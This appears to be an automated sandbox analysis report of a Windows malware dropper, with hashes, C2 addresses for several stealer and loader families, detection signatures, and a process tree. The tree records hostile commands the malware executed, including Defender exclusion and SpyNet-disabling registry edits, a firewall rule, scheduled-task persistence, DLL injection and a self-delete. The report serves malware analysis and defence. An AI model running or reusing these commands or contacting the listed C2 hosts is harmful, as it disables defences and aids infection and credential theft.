Analysis

  • max time kernel
    95s
  • max time network
    171s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    10-03-2022 14:03

General

  • Target

    607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe

  • Size

    8.1MB

  • MD5

    113b2c45c756b171c108b8b5d60dc0cb

  • SHA1

    0fdf20b51c4cc246e323ca985fbcd379b4807ab2

  • SHA256

    607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7

  • SHA512

    2401da89351bdc2c58c6b1187194d825f813dbbb023e33996803e265065abc7c623dd80d28540aa1a0127a843e5d82bbdac34464221191a97ef83833dd0c2627

Malware Config

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

https://sa-us-bucket.s3.us-east-2.amazonaws.com/asdhjk/

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

dadad123

C2

86.107.197.196:63065

Attributes
  • auth_value

    dd4834614a3ac04a7b90791c224626a2

Extracted

Family

vidar

Version

50.6

Botnet

937

C2

https://mas.to/@s4msalo

https://koyu.space/@samsa2l

Attributes
  • profile_id

    937

Signatures

  • DcRat 21 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 4 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • Process spawned unexpected child process 11 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • OnlyLogger Payload 4 IoCs
  • Vidar Stealer 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 43 IoCs
  • Modifies Windows Firewall 1 TTPs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 11 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 11 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 10 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Drops file in System32 directory 7 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 64 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 16 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 6 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 19 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe
    "C:\Users\Admin\AppData\Local\Temp\607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe"
    1⤵
    • DcRat
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2236
    • C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
      "C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2760
    • C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
      "C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
      2⤵
      • Executes dropped EXE
      • Checks whether UAC is enabled
      • Suspicious use of AdjustPrivilegeToken
      PID:4772
    • C:\Users\Admin\AppData\Local\Temp\Folder.exe
      "C:\Users\Admin\AppData\Local\Temp\Folder.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:5044
      • C:\Users\Admin\AppData\Local\Temp\Folder.exe
        "C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
        3⤵
        • Executes dropped EXE
        PID:1396
    • C:\Users\Admin\AppData\Local\Temp\Graphics.exe
      "C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
      2⤵
      • Executes dropped EXE
      PID:3944
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 328
        3⤵
        • Program crash
        PID:3028
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 332
        3⤵
        • Program crash
        PID:3488
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 332
        3⤵
        • Program crash
        PID:4236
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 596
        3⤵
        • Program crash
        PID:2104
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 696
        3⤵
        • Program crash
        PID:2160
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 696
        3⤵
        • Program crash
        PID:1124
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 728
        3⤵
        • Program crash
        PID:2916
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 736
        3⤵
        • Program crash
        PID:2000
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 748
        3⤵
        • Program crash
        PID:3908
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 780
        3⤵
        • Program crash
        PID:4836
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 856
        3⤵
        • Program crash
        PID:1464
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 780
        3⤵
        • Program crash
        PID:1848
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 884
        3⤵
        • Program crash
        PID:2040
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 756
        3⤵
        • Program crash
        PID:2204
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 864
        3⤵
        • Program crash
        PID:2988
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 772
        3⤵
        • Program crash
        PID:5028
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 768
        3⤵
        • Program crash
        PID:3464
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 768
        3⤵
        • Program crash
        PID:4988
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 852
        3⤵
        • Program crash
        PID:1268
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 864
        3⤵
        • Program crash
        PID:384
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 384 -s 632
          4⤵
            PID:1004
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 596
          3⤵
          • Program crash
          PID:3020
        • C:\Users\Admin\AppData\Local\Temp\Graphics.exe
          "C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
          3⤵
          • DcRat
          • Executes dropped EXE
          • Adds Run key to start application
          • Drops file in Windows directory
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:4692
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 292
            4⤵
            • Program crash
            PID:1848
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 296
            4⤵
            • Program crash
            PID:2620
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 296
            4⤵
            • Program crash
            PID:2212
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 636
            4⤵
            • Program crash
            PID:1936
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 636
            4⤵
            • Program crash
            PID:4816
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 636
            4⤵
            • Program crash
            PID:2348
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 636
            4⤵
            • Program crash
            PID:2600
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 708
            4⤵
            • Program crash
            PID:412
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 728
            4⤵
            • Program crash
            PID:4472
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 716
            4⤵
            • Program crash
            PID:3332
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 588
            4⤵
            • Program crash
            PID:1992
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 700
            4⤵
            • Program crash
            PID:3568
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 824
            4⤵
            • Program crash
            PID:4964
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 888
            4⤵
            • Program crash
            PID:4632
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 700
            4⤵
            • Program crash
            PID:1876
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 856
            4⤵
            • Program crash
            PID:3860
          • C:\Windows\system32\cmd.exe
            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:5000
            • C:\Windows\system32\netsh.exe
              netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
              5⤵
                PID:4216
            • C:\Windows\rss\csrss.exe
              C:\Windows\rss\csrss.exe /202-202
              4⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:1568
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 328
                5⤵
                • Program crash
                PID:1196
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 332
                5⤵
                • Program crash
                PID:1364
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 328
                5⤵
                • Program crash
                PID:4924
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 664
                5⤵
                • Program crash
                PID:5080
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 664
                5⤵
                • Program crash
                PID:4852
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 664
                5⤵
                • Program crash
                PID:2732
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 664
                5⤵
                • Program crash
                PID:1268
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 736
                5⤵
                • Program crash
                PID:4236
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 756
                5⤵
                • Program crash
                PID:2432
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 604
                5⤵
                • Program crash
                PID:1080
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 876
                5⤵
                • Program crash
                PID:1440
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 708
                5⤵
                • Program crash
                PID:1196
              • C:\Windows\SYSTEM32\schtasks.exe
                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                5⤵
                • DcRat
                • Creates scheduled task(s)
                PID:2000
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 708
                5⤵
                • Program crash
                PID:3508
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 904
                5⤵
                • Program crash
                PID:1704
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 904
                5⤵
                • Program crash
                PID:2420
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 936
                5⤵
                • Program crash
                PID:3292
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 1008
                5⤵
                • Program crash
                PID:1920
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 980
                5⤵
                • Program crash
                PID:3536
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 984
                5⤵
                • Program crash
                PID:2884
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 1028
                5⤵
                • Program crash
                PID:3576
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 1072
                5⤵
                • Program crash
                PID:3516
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 972
                5⤵
                • Program crash
                PID:2620
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 924
                5⤵
                • Program crash
                PID:1152
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 1056
                5⤵
                • Program crash
                PID:1936
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 996
                5⤵
                • Program crash
                PID:2772
              • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                5⤵
                • Executes dropped EXE
                PID:1156
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 968
                5⤵
                  PID:2616
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 1124
                  5⤵
                    PID:2144
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 1156
                    5⤵
                      PID:4876
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 1096
                      5⤵
                        PID:2080
                • C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
                  "C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:404
                • C:\Users\Admin\AppData\Local\Temp\Install.exe
                  "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4692
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /c taskkill /f /im chrome.exe
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2168
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f /im chrome.exe
                      4⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3432
                • C:\Users\Admin\AppData\Local\Temp\Files.exe
                  "C:\Users\Admin\AppData\Local\Temp\Files.exe"
                  2⤵
                  • DcRat
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Suspicious use of WriteProcessMemory
                  PID:4888
                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    3⤵
                    • Executes dropped EXE
                    PID:2040
                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    3⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1176
                • C:\Users\Admin\AppData\Local\Temp\pub2.exe
                  "C:\Users\Admin\AppData\Local\Temp\pub2.exe"
                  2⤵
                  • Executes dropped EXE
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: MapViewOfSection
                  PID:4212
                • C:\Users\Admin\AppData\Local\Temp\File.exe
                  "C:\Users\Admin\AppData\Local\Temp\File.exe"
                  2⤵
                  • Executes dropped EXE
                  • Checks computer location settings
                  • Suspicious use of WriteProcessMemory
                  PID:4436
                  • C:\Users\Admin\Pictures\Adobe Films\qYP5ae8gJGzlVjaxvAfG2I8a.exe
                    "C:\Users\Admin\Pictures\Adobe Films\qYP5ae8gJGzlVjaxvAfG2I8a.exe"
                    3⤵
                    • Executes dropped EXE
                    PID:1108
                  • C:\Users\Admin\Pictures\Adobe Films\FQpsZZfGz3m87Jl6jcWI9bSG.exe
                    "C:\Users\Admin\Pictures\Adobe Films\FQpsZZfGz3m87Jl6jcWI9bSG.exe"
                    3⤵
                    • Executes dropped EXE
                    • Checks computer location settings
                    • Loads dropped DLL
                    • Checks processor information in registry
                    • Suspicious use of SetWindowsHookEx
                    PID:4988
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /im FQpsZZfGz3m87Jl6jcWI9bSG.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\FQpsZZfGz3m87Jl6jcWI9bSG.exe" & del C:\ProgramData\*.dll & exit
                      4⤵
                        PID:3000
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /im FQpsZZfGz3m87Jl6jcWI9bSG.exe /f
                          5⤵
                          • Kills process with taskkill
                          PID:1408
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /t 6
                          5⤵
                          • Delays execution with timeout.exe
                          PID:4116
                    • C:\Users\Admin\Pictures\Adobe Films\O2asz6Aj0jmIxGOx8FZlN293.exe
                      "C:\Users\Admin\Pictures\Adobe Films\O2asz6Aj0jmIxGOx8FZlN293.exe"
                      3⤵
                      • Executes dropped EXE
                      • Suspicious use of SetWindowsHookEx
                      PID:4656
                      • C:\Windows\SysWOW64\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\Netdhcpsvc\77FTyD6gK21dfSGhRqsixY3e.vbe"
                        4⤵
                        • Checks computer location settings
                        PID:4364
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Netdhcpsvc\jGDslx6begqObyzNRSfaWpJOf.bat" "
                          5⤵
                            PID:5012
                            • C:\Netdhcpsvc\NetdhcpsvcDriverintocrt.exe
                              "C:\Netdhcpsvc\NetdhcpsvcDriverintocrt.exe"
                              6⤵
                              • DcRat
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Adds Run key to start application
                              • Drops file in System32 directory
                              • Drops file in Program Files directory
                              PID:4216
                              • C:\Netdhcpsvc\NetdhcpsvcDriverintocrt.exe
                                "C:\Netdhcpsvc\NetdhcpsvcDriverintocrt.exe"
                                7⤵
                                • Executes dropped EXE
                                PID:1496
                      • C:\Users\Admin\Pictures\Adobe Films\c_mukBcitiv6zGCSo47ynarP.exe
                        "C:\Users\Admin\Pictures\Adobe Films\c_mukBcitiv6zGCSo47ynarP.exe"
                        3⤵
                        • Executes dropped EXE
                        • Checks computer location settings
                        • Drops file in Program Files directory
                        • Suspicious use of SetWindowsHookEx
                        PID:1440
                        • C:\Users\Admin\Documents\yXXvNULregFXMltBKmOl3yOn.exe
                          "C:\Users\Admin\Documents\yXXvNULregFXMltBKmOl3yOn.exe"
                          4⤵
                          • Executes dropped EXE
                          • Checks computer location settings
                          • Suspicious use of SetWindowsHookEx
                          PID:3936
                          • C:\Users\Admin\Pictures\Adobe Films\9eijeUrJt5HFc5qUQ01Ar1rO.exe
                            "C:\Users\Admin\Pictures\Adobe Films\9eijeUrJt5HFc5qUQ01Ar1rO.exe"
                            5⤵
                            • Executes dropped EXE
                            PID:4184
                          • C:\Users\Admin\Pictures\Adobe Films\3QWDJbD9gA1edvmrqjw4wa7y.exe
                            "C:\Users\Admin\Pictures\Adobe Films\3QWDJbD9gA1edvmrqjw4wa7y.exe"
                            5⤵
                            • Executes dropped EXE
                            PID:1444
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1444 -s 616
                              6⤵
                              • Modifies registry class
                              PID:4656
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1444 -s 624
                              6⤵
                                PID:4740
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1444 -s 656
                                6⤵
                                  PID:4724
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1444 -s 824
                                  6⤵
                                    PID:4824
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1444 -s 804
                                    6⤵
                                      PID:2720
                                  • C:\Users\Admin\Pictures\Adobe Films\OGaewSexDdcUewGNh9MbzlbL.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\OGaewSexDdcUewGNh9MbzlbL.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetWindowsHookEx
                                    PID:1980
                                    • C:\Windows\SysWOW64\control.exe
                                      "C:\Windows\System32\control.exe" .\a6U_WGm.9B
                                      6⤵
                                        PID:2944
                                        • C:\Windows\SysWOW64\rundll32.exe
                                          "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\a6U_WGm.9B
                                          7⤵
                                            PID:1336
                                            • C:\Windows\system32\RunDll32.exe
                                              C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\a6U_WGm.9B
                                              8⤵
                                                PID:1084
                                                • C:\Windows\SysWOW64\rundll32.exe
                                                  "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\a6U_WGm.9B
                                                  9⤵
                                                    PID:4468
                                          • C:\Users\Admin\Pictures\Adobe Films\Ez3PxgX8W6KbcsaZX7zmFHWY.exe
                                            "C:\Users\Admin\Pictures\Adobe Films\Ez3PxgX8W6KbcsaZX7zmFHWY.exe"
                                            5⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetWindowsHookEx
                                            PID:4080
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /c taskkill /f /im chrome.exe
                                              6⤵
                                                PID:4468
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /f /im chrome.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:2760
                                            • C:\Users\Admin\Pictures\Adobe Films\LVScHASJYvW4eC6e8OuZpyLG.exe
                                              "C:\Users\Admin\Pictures\Adobe Films\LVScHASJYvW4eC6e8OuZpyLG.exe"
                                              5⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetWindowsHookEx
                                              PID:4132
                                              • C:\Users\Admin\AppData\Local\Temp\7zS967C.tmp\Install.exe
                                                .\Install.exe
                                                6⤵
                                                  PID:2344
                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC26E.tmp\Install.exe
                                                    .\Install.exe /S /site_id "525403"
                                                    7⤵
                                                      PID:4916
                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                        8⤵
                                                          PID:4912
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                            9⤵
                                                              PID:4680
                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                10⤵
                                                                  PID:2120
                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                  10⤵
                                                                    PID:4908
                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                8⤵
                                                                  PID:3584
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                    9⤵
                                                                      PID:2004
                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                        10⤵
                                                                          PID:3120
                                                                        • \??\c:\windows\SysWOW64\reg.exe
